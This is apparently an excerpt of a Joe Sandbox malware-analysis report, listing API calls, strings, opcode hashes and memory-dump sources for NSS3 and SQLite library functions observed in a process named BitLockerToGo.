                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6440D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C641666,?,?), ref: 6C6440FC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6440D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C641666,?,?), ref: 6C644138
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C647CFD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,6C769030), ref: 6C647D1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C641A3E,00000048,00000054), ref: 6C69FD56
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,6C769048), ref: 6C647D2F
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C647D50
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C647D61
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C647D7D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C647D9C
                                                                                                                                                                                                                                                                                                                                                          • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C647DB8
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C647E19
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 70581797-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b4258f2482a253b3fae160bef4c28706bad6df73513a43aae58b544e11e05701
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d9def0719429a73b741e4a789ab3cafa702df4567acc7c946fbd94c8d3d4f205
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4258f2482a253b3fae160bef4c28706bad6df73513a43aae58b544e11e05701
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F841F172A1011A9BEB009F699C41BAF37E4AF5135CF058034EC19ABB51E730E919C7E9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C5DE922
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5DE9CF
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C5DEA0F
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5DEB20
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C5DEB57
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C5DEDC2
                                                                                                                                                                                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 6C5DEE04
                                                                                                                                                                                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 6C5DED18
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpystrlen$memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 638109778-272990098
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1596229d884ab134b7d8bdc5731b5db324d92c921f6abb576bdcdb452fdfa791
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fb57c8297d6fb25462a02da28ee83fa68af43c1d9afd7153f1bf270bec54b247
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1596229d884ab134b7d8bdc5731b5db324d92c921f6abb576bdcdb452fdfa791
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C026D71A01209CFDB04CF5DC880AAEF7B2FF89318F1A85A9D815AB751D771B941CBA4
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5E7E27
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5E7E67
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C5E7EED
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5E7F2E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c5cf1f8d3dbea8fd9579101b5996d8d7fec100933eb695aad556e84bcf3c78bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b65f758125dd6588ba8d413f583276814a24c85d74d0268a4a57c4e7e98f9a9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5cf1f8d3dbea8fd9579101b5996d8d7fec100933eb695aad556e84bcf3c78bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F61B370B042059FDB05CF65CC80BAA37A2BF89348F1849A8EC195BB52D731EC56CBA1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5CFD7A
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5CFD94
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5CFE3C
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5CFE83
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C5CFEFA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C5CFF3B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1169254434-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a58aaf514c128f4825f605058c9cbccb08633aee0c90373adde4a6547c2337f0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: adf11a785e5df2c79ca56a4e40d438d6e79fe7640cc35fb2565651336dca73ec
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a58aaf514c128f4825f605058c9cbccb08633aee0c90373adde4a6547c2337f0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C516D71B002099FDB04CFA9D990AAEB7B1EF48308F14456DE905AB752E731ED54CBA1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C712FFD
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C713007
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C713032
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C77AAF9,?), ref: 6C713073
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7130B3
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C7130C0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C7130BB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 750880481-4279182443
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,?,6C66124D,00000001), ref: 6C658D19
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C66124D,00000001), ref: 6C658D32
                                                                                                                                                                                                                                                                                                                                                          • PL_ArenaRelease.NSS3(?,?,?,?,?,6C66124D,00000001), ref: 6C658D73
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C66124D,00000001), ref: 6C658D8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C66124D,00000001), ref: 6C658DBA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                                                                                                          • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C750EE6
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C750EFA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C63AF0E
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F16
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F1C
                                                                                                                                                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F25
                                                                                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F2B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=cl,?,?,6C634E1D), ref: 6C731C8A
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C731CB6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=cl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1840970956-2776173433
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9ee467a0b94b7068b3c43352a001f38fd3abd295884cd86987e6d5741d3f1001
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4dfdca1b01f3584b473fcc32fa7237269f5daf5a5d89d5f7e6499af2be014f56
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ee467a0b94b7068b3c43352a001f38fd3abd295884cd86987e6d5741d3f1001
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C0124B1B001044BDB10BA28D91297273E5EFC638CB15487DE8489BB02EB22EC56C761
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C714DC3
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C714DE0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C714DDA
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C714DCB
                                                                                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C714DB8
                                                                                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C714DBD
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C714DD5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4c41aba998f9945f2e1d693236919f08015a2dcd09279d8be744277975f36d19
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2170b05fe74872ef4d13c5d9403ce3f1cfcbce6edbce001fe55ab50548df9376
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c41aba998f9945f2e1d693236919f08015a2dcd09279d8be744277975f36d19
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F0B422A2C9686BDF104155CF13F8637595F0272DF5A19B0EF546BF52D205999082A1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C714E30
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C714E4D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C714E47
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C714E38
                                                                                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C714E25
                                                                                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C714E2A
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C714E42
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b2f31129cf9fbd353b25cb332b27fb54227642604978231ae6b500031a615d3f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a68aa6b98c2958c707dd2a3011cbfa1844dcfe77aa38f4c7a359fba93354ad85
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2f31129cf9fbd353b25cb332b27fb54227642604978231ae6b500031a615d3f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F02721F4C92C6BEF200165DF11FC2379E4B0272DF4D44F1EE1867E92D2059AA952F1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,6C681444,?,00000001,?,00000000,00000000,?,?,6C681444,?,?,00000000,?,?), ref: 6C680CB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?,?,6C681444,?), ref: 6C680DC1
                                                                                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?,?,6C681444,?), ref: 6C680DEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C642AF5,?,?,?,?,?,6C640A1B,00000000), ref: 6C6A0F1A
